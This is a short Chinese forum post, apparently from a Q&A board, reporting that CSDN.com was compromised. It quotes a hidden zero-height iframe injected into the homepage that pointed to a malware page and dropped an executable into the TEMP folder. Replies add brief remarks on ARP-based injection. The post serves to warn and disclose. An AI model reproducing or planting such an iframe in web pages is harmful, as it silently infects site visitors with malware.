CSDN.com被挂马

今天早上上班刚开电脑，就开始逛CSDN，然后突然想起一个站，就去CSDN.COM导航里面找，结果一打开，就发现360安全卫士有报警出现，心想估计是CSDN.COM被挂马了，马上查看首页源文件，一查iframe就发现就网页代码的最后添加了一条： 

            <iframe src=http://twoeven.cn/page/rnb.htm?757 width=100 height=0> </iframe> 

截图就不用演示了，我看了下，自动下载一个sin9.exe文件到TEMP目录，然后我再PING了下http://twoeven/page/，IP为：218。77。120。170，是长沙市电信的IP。然后我PING了下csdn.net和csdn.com,发现两个站在同一网段，经验告诉我，CSDN。COM一旦被挂马，那么入侵者很有可能拿了WEBSHELL甚至进一步提权，那也就是说WEB服务器的最高全县很有可能被拿到了，然后接下来的事情就好办了，中间人欺骗或者抓包嗅探，咱们的csdn.net就很危险了。 

本人在网站的联系方式里没发现一个邮件地址，迫于无奈，只好随便挑个位置发了，希望能引起网管的注意，及时清除木马。  --------------------编程问答-------------------- 我怎么有种感觉是你挂的？呵呵，开个玩笑 --------------------编程问答-------------------- 有一种arp挂马可以不攻破服务器，直接在网络传输中就挂马。

补充：云计算 ,  云安全